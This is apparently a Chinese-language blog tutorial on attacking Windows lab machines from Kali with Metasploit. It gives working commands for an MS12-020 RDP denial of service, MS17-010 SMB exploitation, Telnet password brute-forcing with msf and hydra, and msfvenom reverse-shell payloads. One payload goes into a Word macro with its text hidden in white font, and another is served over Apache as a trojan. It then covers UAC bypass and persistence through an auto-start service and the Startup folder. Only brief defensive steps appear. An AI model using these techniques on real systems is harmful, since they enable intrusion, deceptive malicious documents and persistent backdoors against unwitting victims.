相關引數

kali的IP地址為：192.168.0.103/24
win2003的IP地址為：192.168.0.138/24

(一)藍屏攻擊

原理：利用作業系統內核的缺陷，發送大量資料包，則這個漏洞可能造成拒絕服務攻擊或允許遠程執行代碼

前提：對方開啟3389埠且只對某些作業系統有效

操作：

1.掃描

nmap -sS -O [IP地址] 或 nmap -sT [IP地址]
大家看著來啊!(我是比較習慣用這兩個)

如果大家掃描03沒有3389這個埠可以像我一樣打開：

再進行掃描即可

就有了

開始滲透:

1.使用auxiliary/scanner/rdp/ms12_020_check查看對方是否有這個漏洞：

msf> msfconsole
msf> use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(scanner/rdp/ms12_020_check> set rhosts 192.168.0.138
msf auxiliary(scanner/rdp/ms12_020_check> run

2.使用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模塊進行攻擊

root@kali:~#:msfconsole
msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhost 192.168.0.138
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run 

攻擊者

受害者

那如何進行防護呢?
上圖：
（我的電腦右鍵——》屬性）


(應用-確定）

點擊防火墻

高級–》設定–》關閉遠程桌面

再次測驗

注：對方沒開啟3386埠

(二)445埠滲透

前提:對方開啟了445埠
理論:有點多(撓頭)大家可以自行查看(通過IPC$后門共享進去)

net share 可查看共享(IPC $共享了我們的盤)

如果沒有掃描到445埠則開啟（如圖）

1.打開服務將Server打開

2.CMD輸入net share
問你是否打開服務則按Y即可

開始滲透

serach ms17 #可查看對應的模塊
show options #可查看所需引數
root@kali:~#msfconsole
msf > use exploit/windows/smb/ms17_010_psexec 
msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.0.138
msf exploit(windows/smb/ms17_010_psexec) > run 
meterpreter> screenshot #(截圖)
Screenshot saved to: /root/HlFTZjqL.jpeg
meterpreter > 

攻擊成功：

防護呢！就是把Server服務禁止
示例：
停止–》禁用–》應用–》確定

再次滲透：

發現壓根攻不進去！！！

(三)Telnet攻擊

將我們的telnet服務開起來：
啟動型別變成自動——》應用——》確定——再啟動服務

進行nmap掃描

nmap -sV -O [IP地址]  || nmap -sT [IP地址]

可以看到的telnet 的23埠已經起來了

使用use auxiliary/scanner/telnet/telnet_login 模塊
開始滲透
(一)msf模塊暴力破解

msf > use auxiliary/scanner/telnet/telnet_login 
msf auxiliary(scanner/telnet/telnet_login) > set rhosts 192.168.0.138
rhosts => 192.168.0.138
msf auxiliary(scanner/telnet/telnet_login) > set pass_file ~/password.txt
msf auxiliary(scanner/telnet/telnet_login) > set USERNAME administrator
msf auxiliary(scanner/telnet/telnet_login) > run

注：~/password.txt 是~下的密碼字典(可自行生成)

查看到密碼為14106821

進行telnet登錄

登錄后我們可以進行提權什么的操作

二、九頭蛇暴力破解

-L 后為用戶名
-P 后為密碼
root@kali:~# hydra -L ~/user.txt -P ~/password.txt 192.168.43.123 telnet
192.168.43.123為IP地址

使用telnet登錄即可

(三)宏病毒

前提：有office
因為答主2003沒有office，所以就用win7示例

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.43.249 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe

生成一堆代碼
1.截取Sub Auto_Open() 到 End Sub
2.上圖(大概就是從第一行的幾個英文字符開始一直到最后

1.在win7新建work檔案
新建——》打開work——》視圖——》新建宏

2.將我們代碼1粘貼到宏代碼中

ctrl+s

3.將代碼2復制到word中
復制將顏色調整為白色（對方壓根發現不了)


4.msf呼叫模塊回應
剛寫完，忘記保存了，臥槽，重新寫（我吐了)

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.0.105
msf exploit(multi/handler) > exploit 

滲透成功

(四)木馬程式

使用msfvenmon生成
原理和宏病毒類似
但是我覺得它更靈活一些
1.可以搞成服務（再自啟動）只要kali掛著（IP不變就行了(固定IP就可以了)(在內網)
2.放在自啟動檔案夾中

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.0.105 lport=4444 -f exe R > /var/www/html/shell.exe

如何上傳木馬程式呢！
1.445埠暴力破解再通過ftp上傳
2.直接拖
3.apache
4…

445滲透
使用exploit/windows/smb/ms17_010_eternalblue 模塊進行滲透(需對方開啟445)

usf > use exploit/windows/smb/ms17_010_eternalblue 
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.113
rhost => 192.168.0.113
msf exploit(windows/smb/ms17_010_eternalblue) > run

445滲透成功

2.apache

cd /var/www/html
cp index.html index.html.bak //備份
rm index.html
/etc/init.d/apache restart

win7瀏覽器訪問下載即可

開始滲透

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.0.105
msf exploit(multi/handler) > exploit 

二、提權
這邊我使用exploit/windows/local/bypassuac進行提權操作

msf > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > run
msf exploit(windows/local/bypassuac)> shell
meterpreter > getsystem //提權
meterpreter > shell
C:\Windows\system32> copy /d "C:\Users\win2007-1\Desktop\shell.exe" "C:\Windows\system32\shell.exe"
C:\Windows\system32> SC CREATE KJService binPath= "C:\windows\system32\shell.exe" START= auto DISPLAYNAME= "KJService nice" TYPE= own
C:\Windows\system32> net  start KJService  #將服務啟動即可

檢查是否起來

成功
二、啟動檔案目錄
和上面一樣的滲透、提權方法

meterpreter > shell
C:\Windows\system32>  copy /d "C:\Users\win2007-1\Desktop\shell.exe" "C:\Users\win2007-1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\shell.exe"

查看

成功!
大概就這些，以后出個更詳細的
如有哪寫的不對，請多指教，我也是小白